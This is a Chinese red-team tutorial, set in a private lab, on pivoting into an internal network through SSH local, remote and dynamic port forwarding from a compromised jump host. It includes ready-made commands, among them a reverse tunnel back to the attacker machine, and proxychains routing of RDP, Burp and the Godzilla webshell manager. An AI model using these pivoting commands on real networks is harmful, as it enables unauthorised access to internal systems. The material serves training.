红队渗透系列-内网穿透之SSH隧道端口转发
本文视频地址:
https://www.bilibili.com/video/BV1oP411n7uT/
条件:
获取到跳板机权限(获取到账户密码)
跳板机(边缘机)SSH服务启动
静态端口转发-本地/远程端口转发
是指转发的目标应用程序的 IP 地址和监听端口是固定的
SSH 端口转发常用参数
-L 本地端口转发
-R 远程端口转发
-C 压缩传输
-N 静默连接
-g 允许远程主机连接本地的转发端口
-f SSH传输后台执行
-D 动态转发
靶场环境
攻击机 kali 网卡桥接模式 192.168.1.5
跳板机(边缘机)centos 网卡1桥接模式 192.168.1.24 网卡2 仅主机模式 10.10.30.128
目标机win7-3 网卡1 仅主机模式 10.10.30.77
目标机win7 x64 网卡1 仅主机模式 10.10.30.7
本地端口转发-在攻击机上执行命令
ssh -CfNg -L 本地监听端口:目标IP:目标端口 账号@跳板机
ssh -CfNg -L 7788:10.10.30.77:80 root@192.168.1.24
渗透工具设置
火狐不需要设置代理,直接访问本地端口7788,就是访问10.10.30.77:80端口即可
http://192.168.1.5:7788/
远程桌面不需要设置代理,直接连接本地7789端口即可
ssh -CfNg -L 7789:10.10.30.77:3389 root@192.168.1.24
rdesktop 192.168.1.5:7789
远程端口转发-在跳板机(边缘机/靶机)上执行命令
ssh -CfNg -R 攻击机IP:攻击机端口:目标机IP:目标端口 攻击机账号@攻击机ip
ssh -CfNg -R 192.168.1.5:7777:10.10.30.77:80 root@192.168.1.5
火狐不需要设置代理,直接访问本地端口7777
http://127.0.0.1:7777 或者 http://localhost:7777
动态端口转发,SSH隧道的socks代理,而neo regeorg是HTTP隧道的socks代理
目标应用程序的ip地址和监听端口不固定
ssh -Nf -D 12345 root@192.168.1.24
代理工具proxychains的设置
vi /etc/proxychains4.conf
[ProxyList]
socks5 0.0.0.0 12345
渗透工具利用proxychains设置
rdesktop
proxychains rdesktop 10.10.30.77
burp
proxychains java -jar burpsuite.jar
godzilla
proxychains java -jar godzilla.jar
火狐浏览器
在setting->network-setting->Manual proxy configuration->SOCKS Host->127.0.0.1& port ->12345
火狐直接访问 http://10.10.30.77/
如果火狐走burp代理,则设置,然后burp 用proxychains启动即可
在setting->network-setting->Manual proxy configuration->HTTP Proxy->127.0.0.1& port ->8080
proxychains java -jar burp.jar